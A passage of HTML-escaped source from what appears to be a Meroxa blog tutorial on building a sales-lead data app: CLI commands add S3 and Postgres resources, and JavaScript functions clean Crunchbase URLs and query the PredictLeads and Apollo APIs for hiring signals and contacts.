&lt;li&gt;&lt;a href=&quot;https://aws.amazon.com/s3/&quot;&gt;AWS S3&lt;/a&gt; bucket&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://crunchbase.com&quot;&gt;Crunchbase&lt;/a&gt; account (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://predictleads.com&quot;&gt;PredictLeads&lt;/a&gt; account (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.apollo.io/product/api/&quot;&gt;Apollo&lt;/a&gt; (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://salesforce.com&quot;&gt;Salesforce&lt;/a&gt; account (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://slack.com&quot;&gt;Slack&lt;/a&gt; account&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Adding S3 and Postgres Resources to the Data Catalog with the Meroxa CLI&lt;/h3&gt;
&lt;p&gt;The first step in creating a data app is to add the S3 and PostgreSQL resources to the Meroxa catalog. Resources can be added via the dashboard, but we’re going to show you how to add them to the catalog via the CLI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adding S3 (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create datalake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type s3 \\
  --url &quot;s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Adding Postgres (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If your database supports &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/connection-types/logical-replication&quot;&gt;logical replication&lt;/a&gt;, set the metadata configuration value to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Initializing a Turbine JavaScript Data App&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init prospector &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When you initialize the Turbine app, you’ll see we include many comments and boilerplate to help you get up and going. We’ll remove most of this for this example, but take a look around and even execute &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt; to see the output of our sample app.&lt;/p&gt;
&lt;h3&gt;Cleaning the CSV data from Crunchbase&lt;/h3&gt;
&lt;p&gt;In Crunchbase, we can do searches like find all private, active companies that have raised a series A in the last year. It returns a table that looks like the following:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Sales%20Lead%20Data%20App%20Blog%20Post_Image%202.png&quot; alt=&quot;Sales Lead Data App Blog Post_Image 2&quot;&gt;&lt;/p&gt;
&lt;p&gt;When we export the table to CSV, the website URL format is &lt;code class=&quot;language-text&quot;&gt;https://www.[incident.io](&amp;lt;http://incident.io&gt;)/&lt;/code&gt;. To search PredictLeads, our URL needs to be &lt;code class=&quot;language-text&quot;&gt;incident.io&lt;/code&gt; according to &lt;a href=&quot;https://docs.predictleads.com&quot;&gt;their docs&lt;/a&gt;. We need to write private functions in our Turbine app that remove the protocol (http:// or https://), remove the www, and remove the trailing slash. No need to set up an orchestration system (Airflow, Dagster, Prefect) or complex stream processing platform (Spark, Flink, et al) in order to accomplish this. We can transform the URL with plain old Javascript as seen below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;cleanURL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; noProtocol &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeHttp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; noWWW &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeWWW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;noProtocol&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; noSlash &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeSlash&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;noWWW&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; noSlash&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// Remove protocol, www, and trailing slash from URL&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeHttp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; url&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;^&lt;/span&gt;https&lt;span class=&quot;token operator&quot;&gt;?&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;\\&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;\\&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeWWW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;noProtocol&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; noProtocol&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token regex&quot;&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token regex-source language-regex&quot;&gt;^www\\.&lt;/span&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeSlash&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;noWWW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; noWWW&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;\\&lt;span class=&quot;token regex&quot;&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token regex-source language-regex&quot;&gt;$&lt;/span&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Searching Job Descriptions with PredictLeads&lt;/h3&gt;
&lt;p&gt;The PredictLeads API allows us to &lt;a href=&quot;https://docs.predictleads.com/#job-openings&quot;&gt;search a company’s job descriptions&lt;/a&gt;. In our case, if a company is hiring data-specific roles (e.g. Data Engineering, Analytics Engineering, etc…), they could potentially be a Meroxa customer. We send the &lt;code class=&quot;language-text&quot;&gt;cleanURL&lt;/code&gt; to another private function &lt;code class=&quot;language-text&quot;&gt;searchJobTitles&lt;/code&gt; that returns an object containing the &lt;code class=&quot;language-text&quot;&gt;companyUrl&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;jobTitle&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makePLRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; searchTitle &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Data&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; response &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; axios&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
        	&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;https://predictleads.com/api/v2/companies/&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyUrl&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;/job_openings&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            	&lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                	&lt;span class=&quot;token string-property property&quot;&gt;&quot;X-User-Email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;PL_EMAIL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;X-User-Token&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;PL_TOKEN&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        
        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;response&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;status &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;200&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	response&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;job&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; jobTitle &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; job&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;attributes&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;title&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; companyName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; job&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;attributes&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
                
                &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;search&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;searchTitle&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; companyUrl&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; jobTitle &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Finding Contacts with Apollo&lt;/h3&gt;
&lt;p&gt;Next, we use the Apollo API to find a contact at our target company. Apollo’s API &lt;a href=&quot;https://apolloio.github.io/apollo-api-docs/?shell#organization-jobs-postings&quot;&gt;can search job postings&lt;/a&gt;, but for the sake of making things more complex to showcase the Meroxa platform we scoped down Apollo’s usage to &lt;a href=&quot;https://apolloio.github.io/apollo-api-docs/?shell#search&quot;&gt;find contacts&lt;/a&gt;. We pass in our &lt;code class=&quot;language-text&quot;&gt;companyUrl&lt;/code&gt;, to the &lt;code class=&quot;language-text&quot;&gt;findIcpAtCompany&lt;/code&gt; private function and return the contact information with&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findIcpAtCompany&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findContactByRole&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; icpInfo &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;linkedinUrl&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;linkedin_url&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;jobTitle&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;title&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;photo&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;photo_url&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;company&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;organization&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;website&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;organization&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;website
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; icpInfo&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findContactByRole&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; response &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; axios&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;post&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;https://api.apollo.io/v1/people/match&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
        	&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
